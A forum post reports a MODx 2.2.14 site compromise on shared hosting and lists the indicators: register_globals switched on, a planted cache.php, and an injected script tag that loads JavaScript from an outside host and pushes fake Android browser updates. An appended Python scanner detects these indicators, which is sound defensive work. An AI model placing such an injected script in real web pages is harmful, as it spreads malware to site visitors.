I am running MODx 2.2.14-pl. I have recently had this happen to me. I am absolutely certain it was not an FTP credential compromise. I do not know how the compromise happened, but I'm certain it wasn't uploaded via FTP; some other mechanism appears to be at work.
I've done an extensive postmortem of the hacked site. Here is the information I've gleaned:
The hacked site was hosted on a shared server on Hostgator. On or around the same time as the hack took place, the site's php.ini file was modified to turn on register_globals.
A file called cache.php was created in the Assets folder that contained this line of code.
Other files were modified to tamper with the site in a subtle and interesting way in an attempt to spread malware:
1. Directly visiting any URL on the site would serve up the normal page.
2. Clicking on any link on the site to another page on the site would cause a malicious JavaScript to be injected into the HTML just before the closing BODY tag:
<noindex>
<script src="http://stat.rolledwil.biz/stat.php?1921853954"></script>
</noindex>
3. The malicious JavaScript would examine the user-agent header of the requesting browser. For desktop browsers or mobile browsers other than Android 4.1 or earlier, it would return a 404. For mobile browsers that are running under Android 4.1 or earlier, it would pop up a JavaScript alert reading
Warning! You must update Web browser! Update now?
People who clicked the "OK" button in the alert would be redirected to a site that downloaded malware disguised as an Android browser update.
The site from which this malicious JavaScript is being served is hosted on Digital Ocean and its content is served over the Cloudflare CDN. I have reached out to both companies. Neither Digital Ocean nor Cloudflare has expressed any interest in resolving the issue. It is still ongoing as I write this.
I have reuploaded known clean copies of MODx 2.2.14, changed my hosting and FTP credentials, and the problem has returned twice after taking both actions. I have reached out to Hostgator to see if there is a problem with another site or a server configuration issue on the shared hosting box the site lives on, but so far they have not found anything. I suspect this is a (possibly subtle and deeply buried) vulnerability in MODx 2.2.14 that goes back at least as far as 2.2.6.
I've attached a screen grab of what happens when a compromised server is visited in Android. I urge MODx users to check for the existence of this malicious file.
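Added example, not part of the original post: a Python check for the indicators the post lists, namely a php.ini that turns on register_globals, a cache.php inside the Assets folder, and a script tag that appears only when a page is requested with a same-site Referer. The function names, the assumption that the Assets folder is a directory named `assets`, and the sample HTML are constructed for illustration.

```python
import os
import re

# Tolerates the line break after src=" seen in the injected markup.
SCRIPT_SRC = re.compile(r'<script[^>]+src\s*=\s*["\']?\s*([^"\'\s>]+)', re.I)
# Uncommented directive that switches register_globals on.
REG_GLOBALS = re.compile(r'^\s*register_globals\s*=\s*(on|1|true|yes)\b', re.I | re.M)

def scan_webroot(root):
    """Return (indicator, path) pairs for the on-disk changes the post lists."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == "php.ini":
                with open(path, errors="replace") as fh:
                    if REG_GLOBALS.search(fh.read()):
                        findings.append(("register_globals enabled", path))
            # Assumption: "the Assets folder" is a directory named assets/.
            in_assets = os.path.basename(dirpath).lower() == "assets"
            if name.lower() == "cache.php" and in_assets:
                findings.append(("cache.php in assets", path))
    return findings

def injected_scripts(direct_html, referred_html):
    """Script sources present only in the response to a same-site Referer."""
    direct = set(SCRIPT_SRC.findall(direct_html))
    return sorted(set(SCRIPT_SRC.findall(referred_html)) - direct)

if __name__ == "__main__":
    # Constructed sample responses; the injected URL is a placeholder.
    direct = '<body><script src="/js/site.js"></script></body>'
    referred = ('<body><script src="/js/site.js"></script><noindex>\n'
                '<script src="\nhttp://injected.example/stat.php?1"></script>\n'
                '</noindex></body>')
    print(injected_scripts(direct, referred))
    for indicator, path in scan_webroot("."):
        print(indicator, path)
```

To use `injected_scripts` on a live site, fetch the same page twice, once with no Referer header and once with the Referer set to another page on the same site, and pass both bodies in. Treat findings as leads to review by hand rather than as proof of compromise.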